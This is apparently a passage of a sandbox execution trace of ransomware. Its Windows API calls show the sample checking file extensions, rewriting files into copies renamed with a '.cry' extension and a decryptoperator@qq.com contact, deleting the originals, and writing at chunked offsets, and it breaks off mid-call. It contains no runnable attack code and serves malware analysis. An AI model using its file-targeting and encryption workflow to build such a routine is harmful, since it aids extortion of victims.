(lpString1=".xlsx", lpString2="2.EXE") returned -1 [0051.569] lstrlenW (lpString=".ppt") returned 4 [0051.569] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0051.569] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0051.569] lstrlenW (lpString=".zip") returned 4 [0051.569] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0051.569] lstrlenW (lpString=".rar") returned 4 [0051.569] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0051.569] lstrlenW (lpString=".bz2") returned 4 [0051.569] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0051.569] lstrlenW (lpString=".7z") returned 3 [0051.569] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0051.569] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0051.569] lstrlenW (lpString=".dbf") returned 4 [0051.569] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0051.569] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0051.569] lstrlenW (lpString=".1cd") returned 4 [0051.569] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0051.569] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0051.569] lstrlenW (lpString=".jpg") returned 4 [0051.569] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0051.569] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0051.569] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0051.569] lstrlenW (lpString=".doc") returned 4 [0051.569] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0051.569] lstrlenW (lpString=".docx") returned 5 [0051.569] lstrcmpiW (lpString1=".docx", lpString2="2.EXE") returned -1 [0051.569] lstrlenW (lpString=".pdf") returned 4 [0051.569] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0051.569] lstrlenW (lpString=".xls") returned 4 [0051.570] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0051.570] lstrlenW (lpString=".xlsx") returned 5 [0051.570] lstrcmpiW (lpString1=".xlsx", lpString2="2.EXE") returned -1 [0051.570] lstrlenW (lpString=".ppt") returned 4 [0051.570] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0051.570] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0051.570] lstrlenW (lpString=".zip") returned 4 [0051.570] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0051.570] lstrlenW (lpString=".rar") returned 4 [0051.570] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0051.570] lstrlenW (lpString=".bz2") returned 4 [0051.570] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0051.570] lstrlenW (lpString=".7z") returned 3 [0051.570] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0051.570] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0051.570] lstrlenW (lpString=".dbf") returned 4 [0051.570] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0051.570] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0051.570] lstrlenW (lpString=".1cd") returned 4 [0051.570] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0051.570] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0051.570] lstrlenW (lpString=".jpg") returned 4 [0051.570] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0051.570] lstrcmpiW (lpString1=".dll", lpString2=".cry") returned 1 [0051.570] lstrlenW (lpString="odffilt.dll") returned 11 [0051.571] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0051.634] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=1312656) returned 1 [0051.634] CloseHandle (hObject=0x210) returned 1 [0051.634] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll")) returned 0x20 [0051.634] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.634] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0051.634] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.634] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.634] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0051.635] GetLastError () returned 0x0 [0051.635] ReadFile (in: hFile=0x210, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0051.904] WriteFile (in: hFile=0x1ac, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0051.931] ReadFile (in: hFile=0x210, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x407a0, lpOverlapped=0x0) returned 1 [0052.058] WriteFile (in: hFile=0x1ac, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0x407b0, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0x407b0, lpOverlapped=0x0) returned 1 [0052.065] ReadFile (in: hFile=0x210, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.065] WriteFile (in: hFile=0x1ac, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xea, lpOverlapped=0x0) returned 1 [0052.065] SetEndOfFile (hFile=0x1ac) returned 1 [0052.065] CloseHandle (hObject=0x1ac) returned 1 [0052.066] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.066] SetEndOfFile (hFile=0x210) returned 1 [0052.068] CloseHandle (hObject=0x210) returned 1 [0052.068] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.068] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll")) returned 1 [0052.069] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0052.069] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0052.069] lstrlenW (lpString=".doc") returned 4 [0052.069] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0052.069] lstrlenW (lpString=".docx") returned 5 [0052.069] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0052.069] lstrlenW (lpString=".pdf") returned 4 [0052.069] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0052.069] lstrlenW (lpString=".xls") returned 4 [0052.069] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0052.069] lstrlenW (lpString=".xlsx") returned 5 [0052.069] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0052.069] lstrlenW (lpString=".ppt") returned 4 [0052.069] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0052.069] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0052.069] lstrlenW (lpString=".zip") returned 4 [0052.069] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0052.069] lstrlenW (lpString=".rar") returned 4 [0052.069] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0052.069] lstrlenW (lpString=".bz2") returned 4 [0052.069] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0052.069] lstrlenW (lpString=".7z") returned 3 [0052.069] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0052.069] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0052.069] lstrlenW (lpString=".dbf") returned 4 [0052.069] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0052.069] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0052.069] lstrlenW (lpString=".1cd") returned 4 [0052.069] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0052.069] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0052.069] lstrlenW (lpString=".jpg") returned 4 [0052.069] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0052.069] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0052.069] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0052.069] lstrlenW (lpString=".doc") returned 4 [0052.069] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0052.069] lstrlenW (lpString=".docx") returned 5 [0052.069] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0052.069] lstrlenW (lpString=".pdf") returned 4 [0052.070] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0052.070] lstrlenW (lpString=".xls") returned 4 [0052.070] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0052.070] lstrlenW (lpString=".xlsx") returned 5 [0052.070] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0052.070] lstrlenW (lpString=".ppt") returned 4 [0052.070] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0052.070] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0052.070] lstrlenW (lpString=".zip") returned 4 [0052.070] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0052.070] lstrlenW (lpString=".rar") returned 4 [0052.070] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0052.070] lstrlenW (lpString=".bz2") returned 4 [0052.070] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0052.070] lstrlenW (lpString=".7z") returned 3 [0052.070] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0052.070] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0052.070] lstrlenW (lpString=".dbf") returned 4 [0052.070] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0052.070] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0052.070] lstrlenW (lpString=".1cd") returned 4 [0052.070] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0052.070] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0052.070] lstrlenW (lpString=".jpg") returned 4 [0052.070] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0052.070] lstrcmpiW (lpString1=".CGM", lpString2=".cry") returned -1 [0052.070] lstrlenW (lpString="MS.CGM") returned 6 [0052.070] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0052.071] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=1908) returned 1 [0052.071] CloseHandle (hObject=0x210) returned 1 [0052.071] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm")) returned 0x20 [0052.071] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.071] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0052.071] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.071] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.071] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0052.187] GetLastError () returned 0x0 [0052.187] ReadFile (in: hFile=0x210, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x774, lpOverlapped=0x0) returned 1 [0052.214] WriteFile (in: hFile=0x1c4, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0x780, lpOverlapped=0x0) returned 1 [0052.215] ReadFile (in: hFile=0x210, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.215] WriteFile (in: hFile=0x1c4, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xe0, lpOverlapped=0x0) returned 1 [0052.215] SetEndOfFile (hFile=0x1c4) returned 1 [0052.392] CloseHandle (hObject=0x1c4) returned 1 [0052.392] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.392] SetEndOfFile (hFile=0x210) returned 1 [0052.393] CloseHandle (hObject=0x210) returned 1 [0052.393] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.393] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm")) returned 1 [0052.398] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0052.398] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0052.398] lstrlenW (lpString=".doc") returned 4 [0052.398] lstrcmpiW (lpString1=".doc", lpString2=".CGM") returned 1 [0052.398] lstrlenW (lpString=".docx") returned 5 [0052.398] lstrcmpiW (lpString1=".docx", lpString2="S.CGM") returned -1 [0052.398] lstrlenW (lpString=".pdf") returned 4 [0052.398] lstrcmpiW (lpString1=".pdf", lpString2=".CGM") returned 1 [0052.398] lstrlenW (lpString=".xls") returned 4 [0052.398] lstrcmpiW (lpString1=".xls", lpString2=".CGM") returned 1 [0052.398] lstrlenW (lpString=".xlsx") returned 5 [0052.398] lstrcmpiW (lpString1=".xlsx", lpString2="S.CGM") returned -1 [0052.399] lstrlenW (lpString=".ppt") returned 4 [0052.399] lstrcmpiW (lpString1=".ppt", lpString2=".CGM") returned 1 [0052.399] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0052.399] lstrlenW (lpString=".zip") returned 4 [0052.399] lstrcmpiW (lpString1=".zip", lpString2=".CGM") returned 1 [0052.399] lstrlenW (lpString=".rar") returned 4 [0052.399] lstrcmpiW (lpString1=".rar", lpString2=".CGM") returned 1 [0052.399] lstrlenW (lpString=".bz2") returned 4 [0052.399] lstrcmpiW (lpString1=".bz2", lpString2=".CGM") returned -1 [0052.399] lstrlenW (lpString=".7z") returned 3 [0052.399] lstrcmpiW (lpString1=".7z", lpString2="CGM") returned -1 [0052.399] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0052.399] lstrlenW (lpString=".dbf") returned 4 [0052.399] lstrcmpiW (lpString1=".dbf", lpString2=".CGM") returned 1 [0052.399] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0052.399] lstrlenW (lpString=".1cd") returned 4 [0052.399] lstrcmpiW (lpString1=".1cd", lpString2=".CGM") returned -1 [0052.399] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0052.399] lstrlenW (lpString=".jpg") returned 4 [0052.399] lstrcmpiW (lpString1=".jpg", lpString2=".CGM") returned 1 [0052.399] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0052.399] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0052.399] lstrlenW (lpString=".doc") returned 4 [0052.399] lstrcmpiW (lpString1=".doc", lpString2=".CGM") returned 1 [0052.399] lstrlenW (lpString=".docx") returned 5 [0052.399] lstrcmpiW (lpString1=".docx", lpString2="S.CGM") returned -1 [0052.399] lstrlenW (lpString=".pdf") returned 4 [0052.399] lstrcmpiW (lpString1=".pdf", lpString2=".CGM") returned 1 [0052.399] lstrlenW (lpString=".xls") returned 4 [0052.399] lstrcmpiW (lpString1=".xls", lpString2=".CGM") returned 1 [0052.399] lstrlenW (lpString=".xlsx") returned 5 [0052.400] lstrcmpiW (lpString1=".xlsx", lpString2="S.CGM") returned -1 [0052.400] lstrlenW (lpString=".ppt") returned 4 [0052.400] lstrcmpiW (lpString1=".ppt", lpString2=".CGM") returned 1 [0052.400] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0052.400] lstrlenW (lpString=".zip") returned 4 [0052.400] lstrcmpiW (lpString1=".zip", lpString2=".CGM") returned 1 [0052.400] lstrlenW (lpString=".rar") returned 4 [0052.400] lstrcmpiW (lpString1=".rar", lpString2=".CGM") returned 1 [0052.400] lstrlenW (lpString=".bz2") returned 4 [0052.400] lstrcmpiW (lpString1=".bz2", lpString2=".CGM") returned -1 [0052.401] lstrlenW (lpString=".7z") returned 3 [0052.401] lstrcmpiW (lpString1=".7z", lpString2="CGM") returned -1 [0052.401] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0052.401] lstrlenW (lpString=".dbf") returned 4 [0052.401] lstrcmpiW (lpString1=".dbf", lpString2=".CGM") returned 1 [0052.401] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0052.401] lstrlenW (lpString=".1cd") returned 4 [0052.401] lstrcmpiW (lpString1=".1cd", lpString2=".CGM") returned -1 [0052.401] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0052.401] lstrlenW (lpString=".jpg") returned 4 [0052.401] lstrcmpiW (lpString1=".jpg", lpString2=".CGM") returned 1 [0052.401] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0052.401] lstrlenW (lpString="ITIRCL55.DLL") returned 12 [0052.401] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0052.493] GetFileSizeEx (in: hFile=0x1ac, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=1831424) returned 1 [0052.493] CloseHandle (hObject=0x1ac) returned 1 [0052.494] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll")) returned 0x20 [0052.496] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.496] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0052.497] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0052.497] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc6c | out: lpNewFilePointer=0x0) returned 1 [0052.497] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0052.497] ReadFile (in: hFile=0x190, lpBuffer=0x3d90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d90058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0052.548] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x950aa, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0052.548] ReadFile (in: hFile=0x190, lpBuffer=0x3dd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3dd0058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0052.591] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x329fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0052.592] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x17f200, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0052.592] ReadFile (in: hFile=0x190, lpBuffer=0x3e10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e10058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0052.678] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.678] WriteFile (in: hFile=0x190, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x329fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0052.729] SetEndOfFile (hFile=0x190) returned 1 [0052.729] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3ef0060 [0052.743] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.744] WriteFile (in: hFile=0x190, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.752] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x950aa, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.752] WriteFile (in: hFile=0x190, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.754] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x17f200, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.754] WriteFile (in: hFile=0x190, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.755] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3ef0060 | 